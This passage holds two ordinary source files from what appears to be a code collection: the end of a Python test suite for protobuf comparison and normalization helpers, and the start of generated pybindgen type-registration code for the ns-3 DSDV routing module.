    compare.NormalizeNumberFields(pb)
    self.assertTrue(isinstance(pb.int64_, six.integer_types))

    pb.int64_ = 4
    compare.NormalizeNumberFields(pb)
    self.assertTrue(isinstance(pb.int64_, six.integer_types))

    # A value beyond 32 bits must still normalize to an integer type.
    pb.int64_ = 9999999999999999
    compare.NormalizeNumberFields(pb)
    self.assertTrue(isinstance(pb.int64_, six.integer_types))

  def testNormalizesRepeatedInts(self):
    pb = compare_test_pb2.Large()
    pb.int64s.extend([1, 400, 999999999999999])
    compare.NormalizeNumberFields(pb)
    self.assertTrue(isinstance(pb.int64s[0], six.integer_types))
    self.assertTrue(isinstance(pb.int64s[1], six.integer_types))
    self.assertTrue(isinstance(pb.int64s[2], six.integer_types))

  def testNormalizesFloats(self):
    # Values that differ only beyond float precision compare equal after
    # normalization.
    pb1 = compare_test_pb2.Large()
    pb1.float_ = 1.2314352351231
    pb2 = compare_test_pb2.Large()
    pb2.float_ = 1.231435
    self.assertNotEqual(pb1.float_, pb2.float_)
    compare.NormalizeNumberFields(pb1)
    compare.NormalizeNumberFields(pb2)
    self.assertEqual(pb1.float_, pb2.float_)

  def testNormalizesRepeatedFloats(self):
    pb = compare_test_pb2.Large()
    pb.medium.floats.extend([0.111111111, 0.111111])
    compare.NormalizeNumberFields(pb)
    for value in pb.medium.floats:
      self.assertAlmostEqual(0.111111, value)

  def testNormalizesDoubles(self):
    pb1 = compare_test_pb2.Large()
    pb1.double_ = 1.2314352351231
    pb2 = compare_test_pb2.Large()
    pb2.double_ = 1.2314352
    self.assertNotEqual(pb1.double_, pb2.double_)
    compare.NormalizeNumberFields(pb1)
    compare.NormalizeNumberFields(pb2)
    self.assertEqual(pb1.double_, pb2.double_)

  def testNormalizesMaps(self):
    # Only checks that map-valued fields are traversed without error.
    pb = compare_test_pb2.WithMap()
    pb.value_message[4].strings.extend(['a', 'b', 'c'])
    pb.value_string['d'] = 'e'
    compare.NormalizeNumberFields(pb)
class AssertTest(googletest.TestCase):
  """Tests assertProtoEqual()."""

  # NOTE(review): the extraction of this file collapsed whitespace runs; the
  # interior alignment of the expected-diff strings below (the '?  ... ^'
  # marker columns and context-line indents) was reconstructed from difflib
  # ndiff conventions -- verify against the original source.

  def assertProtoEqual(self, a, b, **kwargs):
    # Accepts either ASCII protobuf strings (parsed as Large messages) or
    # already-built messages.
    if isinstance(a, six.string_types) and isinstance(b, six.string_types):
      a, b = LargePbs(a, b)
    compare.assertProtoEqual(self, a, b, **kwargs)

  def assertAll(self, a, **kwargs):
    """Checks that all possible asserts pass."""
    self.assertProtoEqual(a, a, **kwargs)

  def assertSameNotEqual(self, a, b):
    """Checks that assertProtoEqual() fails."""
    self.assertRaises(AssertionError, self.assertProtoEqual, a, b)

  def assertNone(self, a, b, message, **kwargs):
    """Checks that all possible asserts fail with the given message."""
    message = re.escape(textwrap.dedent(message))
    self.assertRaisesRegexp(AssertionError, message, self.assertProtoEqual, a,
                            b, **kwargs)

  def testCheckInitialized(self):
    # neither is initialized
    a = compare_test_pb2.Labeled()
    a.optional = 1
    self.assertNone(a, a, 'Initialization errors: ', check_initialized=True)
    self.assertAll(a, check_initialized=False)

    # a is initialized, b isn't
    b = copy.deepcopy(a)
    a.required = 2
    self.assertNone(a, b, 'Initialization errors: ', check_initialized=True)
    self.assertNone(
        a,
        b,
        """
        - required: 2
          optional: 1
        """,
        check_initialized=False)

    # both are initialized
    a = compare_test_pb2.Labeled()
    a.required = 2
    self.assertAll(a, check_initialized=True)
    self.assertAll(a, check_initialized=False)

    b = copy.deepcopy(a)
    b.required = 3
    message = """
    - required: 2
    ?           ^
    + required: 3
    ?           ^
    """
    self.assertNone(a, b, message, check_initialized=True)
    self.assertNone(a, b, message, check_initialized=False)

  def testAssertEqualWithStringArg(self):
    pb = compare_test_pb2.Large()
    pb.string_ = 'abc'
    pb.float_ = 1.234
    compare.assertProtoEqual(self, """
      string_: 'abc'
      float_: 1.234
      """, pb)

  def testNormalizesNumbers(self):
    pb1 = compare_test_pb2.Large()
    pb1.int64_ = 4
    pb2 = compare_test_pb2.Large()
    pb2.int64_ = 4
    compare.assertProtoEqual(self, pb1, pb2)

  def testNormalizesFloat(self):
    pb1 = compare_test_pb2.Large()
    pb1.double_ = 4.0
    pb2 = compare_test_pb2.Large()
    pb2.double_ = 4
    compare.assertProtoEqual(self, pb1, pb2, normalize_numbers=True)

  def testPrimitives(self):
    self.assertAll('string_: "x"')
    self.assertNone('string_: "x"', 'string_: "y"', """
                    - string_: "x"
                    ?           ^
                    + string_: "y"
                    ?           ^
                    """)

  def testRepeatedPrimitives(self):
    self.assertAll('int64s: 0 int64s: 1')

    self.assertSameNotEqual('int64s: 0 int64s: 1', 'int64s: 1 int64s: 0')
    self.assertSameNotEqual('int64s: 0 int64s: 1 int64s: 2',
                            'int64s: 2 int64s: 1 int64s: 0')

    self.assertSameNotEqual('int64s: 0', 'int64s: 0 int64s: 0')
    self.assertSameNotEqual('int64s: 0 int64s: 1',
                            'int64s: 1 int64s: 0 int64s: 1')

    self.assertNone('int64s: 0', 'int64s: 0 int64s: 2', """
                      int64s: 0
                    + int64s: 2
                    """)
    self.assertNone('int64s: 0 int64s: 1', 'int64s: 0 int64s: 2', """
                      int64s: 0
                    - int64s: 1
                    ?         ^
                    + int64s: 2
                    ?         ^
                    """)

  def testMessage(self):
    self.assertAll('medium: {}')
    self.assertAll('medium: { smalls: {} }')
    self.assertAll('medium: { int32s: 1 smalls: {} }')
    self.assertAll('medium: { smalls: { strings: "x" } }')
    self.assertAll(
        'medium: { smalls: { strings: "x" } } small: { strings: "y" }')

    self.assertSameNotEqual('medium: { smalls: { strings: "x" strings: "y" } }',
                            'medium: { smalls: { strings: "y" strings: "x" } }')
    self.assertSameNotEqual(
        'medium: { smalls: { strings: "x" } smalls: { strings: "y" } }',
        'medium: { smalls: { strings: "y" } smalls: { strings: "x" } }')
    self.assertSameNotEqual(
        'medium: { smalls: { strings: "x" strings: "y" strings: "x" } }',
        'medium: { smalls: { strings: "y" strings: "x" } }')
    self.assertSameNotEqual(
        'medium: { smalls: { strings: "x" } int32s: 0 }',
        'medium: { int32s: 0 smalls: { strings: "x" } int32s: 0 }')

    self.assertNone('medium: {}', 'medium: { smalls: { strings: "x" } }', """
                      medium {
                    +   smalls {
                    +     strings: "x"
                    +   }
                      }
                    """)
    self.assertNone('medium: { smalls: { strings: "x" } }',
                    'medium: { smalls: {} }', """
                      medium {
                        smalls {
                    -     strings: "x"
                        }
                      }
                    """)
    self.assertNone('medium: { int32s: 0 }', 'medium: { int32s: 1 }', """
                      medium {
                    -   int32s: 0
                    ?           ^
                    +   int32s: 1
                    ?           ^
                      }
                    """)

  def testMsgPassdown(self):
    # The custom msg= must appear in the failure raised by assertProtoEqual.
    self.assertRaisesRegexp(
        AssertionError,
        'test message passed down',
        self.assertProtoEqual,
        'medium: {}',
        'medium: { smalls: { strings: "x" } }',
        msg='test message passed down')

  def testRepeatedMessage(self):
    self.assertAll('medium: { smalls: {} smalls: {} }')
    self.assertAll('medium: { smalls: { strings: "x" } } medium: {}')
    self.assertAll('medium: { smalls: { strings: "x" } } medium: { int32s: 0 }')
    self.assertAll('medium: { smalls: {} smalls: { strings: "x" } } small: {}')

    self.assertSameNotEqual('medium: { smalls: { strings: "x" } smalls: {} }',
                            'medium: { smalls: {} smalls: { strings: "x" } }')
    self.assertSameNotEqual('medium: { smalls: {} }',
                            'medium: { smalls: {} smalls: {} }')
    self.assertSameNotEqual('medium: { smalls: {} smalls: {} } medium: {}',
                            'medium: {} medium: {} medium: { smalls: {} }')
    self.assertSameNotEqual(
        'medium: { smalls: { strings: "x" } smalls: {} }',
        'medium: { smalls: {} smalls: { strings: "x" } smalls: {} }')

    self.assertNone('medium: {}', 'medium: {} medium { smalls: {} }', """
                      medium {
                    +   smalls {
                    +   }
                      }
                    """)
    self.assertNone('medium: { smalls: {} smalls: { strings: "x" } }',
                    'medium: { smalls: {} smalls: { strings: "y" } }', """
                      medium {
                        smalls {
                        }
                        smalls {
                    -     strings: "x"
                    ?              ^
                    +     strings: "y"
                    ?              ^
                        }
                      }
                    """)
class MixinTests(compare.ProtoAssertions, googletest.TestCase):
  """Checks that ProtoAssertions works when mixed into a TestCase."""

  def testAssertEqualWithStringArg(self):
    pb = compare_test_pb2.Large()
    pb.string_ = 'abc'
    pb.float_ = 1.234
    # The mixin exposes assertProtoEqual directly on the test case.
    self.assertProtoEqual("""
      string_: 'abc'
      float_: 1.234
      """, pb)


if __name__ == '__main__':
  googletest.main()
| apache-2.0 |
rabimba/ns-3.18 | src/dsdv/bindings/modulegen__gcc_ILP32.py | 24 | 465540 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
    """Pybindgen error handler that reports wrapper failures as warnings."""

    def handle_error(self, wrapper, exception, traceback_):
        # Surface the failure but return True so pybindgen skips the broken
        # wrapper and keeps generating the rest of the bindings.
        warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
        return True


# Install the lenient handler globally for this generation run.
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
    """Creates and returns the root pybindgen module for the ns.dsdv bindings."""
    return Module('ns.dsdv', cpp_namespace='::ns3')
def register_types(module):
    """Register every C++ type exposed by the dsdv Python bindings.

    Generated by the ns-3 bindings generator. Registration order matters:
    base classes and outer classes are added before the derived/nested
    classes that reference them via ``root_module[...]`` lookups. Nested
    namespaces (FatalImpl, Hash, dsdv) are registered last through their
    own ``register_types_ns3_*`` helpers.
    """
    root_module = module.get_root()
    ## address.h (module 'network'): ns3::Address [class]
    module.add_class('Address', import_from_module='ns.network')
    ## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
    module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network')
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
    module.add_class('AttributeConstructionList', import_from_module='ns.core')
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
    module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
    ## buffer.h (module 'network'): ns3::Buffer [class]
    module.add_class('Buffer', import_from_module='ns.network')
    ## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
    module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer'])
    ## packet.h (module 'network'): ns3::ByteTagIterator [class]
    module.add_class('ByteTagIterator', import_from_module='ns.network')
    ## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator'])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
    module.add_class('ByteTagList', import_from_module='ns.network')
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
    module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList'])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator'])
    ## callback.h (module 'core'): ns3::CallbackBase [class]
    module.add_class('CallbackBase', import_from_module='ns.core')
    ## event-id.h (module 'core'): ns3::EventId [class]
    module.add_class('EventId', import_from_module='ns.core')
    ## hash.h (module 'core'): ns3::Hasher [class]
    module.add_class('Hasher', import_from_module='ns.core')
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
    module.add_class('Inet6SocketAddress', import_from_module='ns.network')
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
    root_module['ns3::Inet6SocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
    module.add_class('InetSocketAddress', import_from_module='ns.network')
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
    root_module['ns3::InetSocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
    ## int-to-type.h (module 'core'): ns3::IntToType<0> [struct]
    module.add_class('IntToType', import_from_module='ns.core', template_parameters=['0'])
    ## int-to-type.h (module 'core'): ns3::IntToType<0>::v_e [enumeration]
    module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 0 >'], import_from_module='ns.core')
    ## int-to-type.h (module 'core'): ns3::IntToType<1> [struct]
    module.add_class('IntToType', import_from_module='ns.core', template_parameters=['1'])
    ## int-to-type.h (module 'core'): ns3::IntToType<1>::v_e [enumeration]
    module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 1 >'], import_from_module='ns.core')
    ## int-to-type.h (module 'core'): ns3::IntToType<2> [struct]
    module.add_class('IntToType', import_from_module='ns.core', template_parameters=['2'])
    ## int-to-type.h (module 'core'): ns3::IntToType<2>::v_e [enumeration]
    module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 2 >'], import_from_module='ns.core')
    ## int-to-type.h (module 'core'): ns3::IntToType<3> [struct]
    module.add_class('IntToType', import_from_module='ns.core', template_parameters=['3'])
    ## int-to-type.h (module 'core'): ns3::IntToType<3>::v_e [enumeration]
    module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 3 >'], import_from_module='ns.core')
    ## int-to-type.h (module 'core'): ns3::IntToType<4> [struct]
    module.add_class('IntToType', import_from_module='ns.core', template_parameters=['4'])
    ## int-to-type.h (module 'core'): ns3::IntToType<4>::v_e [enumeration]
    module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 4 >'], import_from_module='ns.core')
    ## int-to-type.h (module 'core'): ns3::IntToType<5> [struct]
    module.add_class('IntToType', import_from_module='ns.core', template_parameters=['5'])
    ## int-to-type.h (module 'core'): ns3::IntToType<5>::v_e [enumeration]
    module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 5 >'], import_from_module='ns.core')
    ## int-to-type.h (module 'core'): ns3::IntToType<6> [struct]
    module.add_class('IntToType', import_from_module='ns.core', template_parameters=['6'])
    ## int-to-type.h (module 'core'): ns3::IntToType<6>::v_e [enumeration]
    module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 6 >'], import_from_module='ns.core')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
    module.add_class('Ipv4Address', import_from_module='ns.network')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
    root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress [class]
    module.add_class('Ipv4InterfaceAddress', import_from_module='ns.internet')
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e [enumeration]
    module.add_enum('InterfaceAddressScope_e', ['HOST', 'LINK', 'GLOBAL'], outer_class=root_module['ns3::Ipv4InterfaceAddress'], import_from_module='ns.internet')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
    module.add_class('Ipv4Mask', import_from_module='ns.network')
    ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper [class]
    module.add_class('Ipv4RoutingHelper', allow_subclassing=True, import_from_module='ns.internet')
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
    module.add_class('Ipv6Address', import_from_module='ns.network')
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
    root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress [class]
    module.add_class('Ipv6InterfaceAddress', import_from_module='ns.internet')
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::State_e [enumeration]
    module.add_enum('State_e', ['TENTATIVE', 'DEPRECATED', 'PREFERRED', 'PERMANENT', 'HOMEADDRESS', 'TENTATIVE_OPTIMISTIC', 'INVALID'], outer_class=root_module['ns3::Ipv6InterfaceAddress'], import_from_module='ns.internet')
    ## ipv6-interface-address.h (module 'internet'): ns3::Ipv6InterfaceAddress::Scope_e [enumeration]
    module.add_enum('Scope_e', ['HOST', 'LINKLOCAL', 'GLOBAL'], outer_class=root_module['ns3::Ipv6InterfaceAddress'], import_from_module='ns.internet')
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
    module.add_class('Ipv6Prefix', import_from_module='ns.network')
    ## node-container.h (module 'network'): ns3::NodeContainer [class]
    module.add_class('NodeContainer', import_from_module='ns.network')
    ## object-base.h (module 'core'): ns3::ObjectBase [class]
    module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
    ## object.h (module 'core'): ns3::ObjectDeleter [struct]
    module.add_class('ObjectDeleter', import_from_module='ns.core')
    ## object-factory.h (module 'core'): ns3::ObjectFactory [class]
    module.add_class('ObjectFactory', import_from_module='ns.core')
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
    module.add_class('PacketMetadata', import_from_module='ns.network')
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
    module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network')
    ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
    module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
    ## packet.h (module 'network'): ns3::PacketTagIterator [class]
    module.add_class('PacketTagIterator', import_from_module='ns.network')
    ## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
    module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator'])
    ## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
    module.add_class('PacketTagList', import_from_module='ns.network')
    ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
    module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList'])
    ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData_e [enumeration]
    module.add_enum('TagData_e', ['MAX_SIZE'], outer_class=root_module['ns3::PacketTagList::TagData'], import_from_module='ns.network')
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simulator.h (module 'core'): ns3::Simulator [class]
    module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
    ## tag.h (module 'network'): ns3::Tag [class]
    module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
    ## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
    module.add_class('TagBuffer', import_from_module='ns.network')
    ## timer.h (module 'core'): ns3::Timer [class]
    module.add_class('Timer', import_from_module='ns.core')
    ## timer.h (module 'core'): ns3::Timer::DestroyPolicy [enumeration]
    module.add_enum('DestroyPolicy', ['CANCEL_ON_DESTROY', 'REMOVE_ON_DESTROY', 'CHECK_ON_DESTROY'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core')
    ## timer.h (module 'core'): ns3::Timer::State [enumeration]
    module.add_enum('State', ['RUNNING', 'EXPIRED', 'SUSPENDED'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core')
    ## timer-impl.h (module 'core'): ns3::TimerImpl [class]
    module.add_class('TimerImpl', allow_subclassing=True, import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId [class]
    module.add_class('TypeId', import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
    module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
    module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
    module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
    ## empty.h (module 'core'): ns3::empty [class]
    module.add_class('empty', import_from_module='ns.core')
    ## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
    module.add_class('int64x64_t', import_from_module='ns.core')
    ## chunk.h (module 'network'): ns3::Chunk [class]
    module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
    ## dsdv-helper.h (module 'dsdv'): ns3::DsdvHelper [class]
    module.add_class('DsdvHelper', parent=root_module['ns3::Ipv4RoutingHelper'])
    ## header.h (module 'network'): ns3::Header [class]
    module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header [class]
    module.add_class('Ipv4Header', import_from_module='ns.internet', parent=root_module['ns3::Header'])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType [enumeration]
    module.add_enum('DscpType', ['DscpDefault', 'DSCP_CS1', 'DSCP_AF11', 'DSCP_AF12', 'DSCP_AF13', 'DSCP_CS2', 'DSCP_AF21', 'DSCP_AF22', 'DSCP_AF23', 'DSCP_CS3', 'DSCP_AF31', 'DSCP_AF32', 'DSCP_AF33', 'DSCP_CS4', 'DSCP_AF41', 'DSCP_AF42', 'DSCP_AF43', 'DSCP_CS5', 'DSCP_EF', 'DSCP_CS6', 'DSCP_CS7'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType [enumeration]
    module.add_enum('EcnType', ['ECN_NotECT', 'ECN_ECT1', 'ECN_ECT0', 'ECN_CE'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
    ## ipv6-header.h (module 'internet'): ns3::Ipv6Header [class]
    module.add_class('Ipv6Header', import_from_module='ns.internet', parent=root_module['ns3::Header'])
    ## ipv6-header.h (module 'internet'): ns3::Ipv6Header::NextHeader_e [enumeration]
    module.add_enum('NextHeader_e', ['IPV6_EXT_HOP_BY_HOP', 'IPV6_IPV4', 'IPV6_TCP', 'IPV6_UDP', 'IPV6_IPV6', 'IPV6_EXT_ROUTING', 'IPV6_EXT_FRAGMENTATION', 'IPV6_EXT_CONFIDENTIALITY', 'IPV6_EXT_AUTHENTIFICATION', 'IPV6_ICMPV6', 'IPV6_EXT_END', 'IPV6_EXT_DESTINATION', 'IPV6_SCTP', 'IPV6_EXT_MOBILITY', 'IPV6_UDP_LITE'], outer_class=root_module['ns3::Ipv6Header'], import_from_module='ns.internet')
    ## object.h (module 'core'): ns3::Object [class]
    module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
    ## object.h (module 'core'): ns3::Object::AggregateIterator [class]
    module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
    ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class]
    module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object'])
    ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class]
    module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4MulticastRoute', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4MulticastRoute>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4Route', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4Route>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
    module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
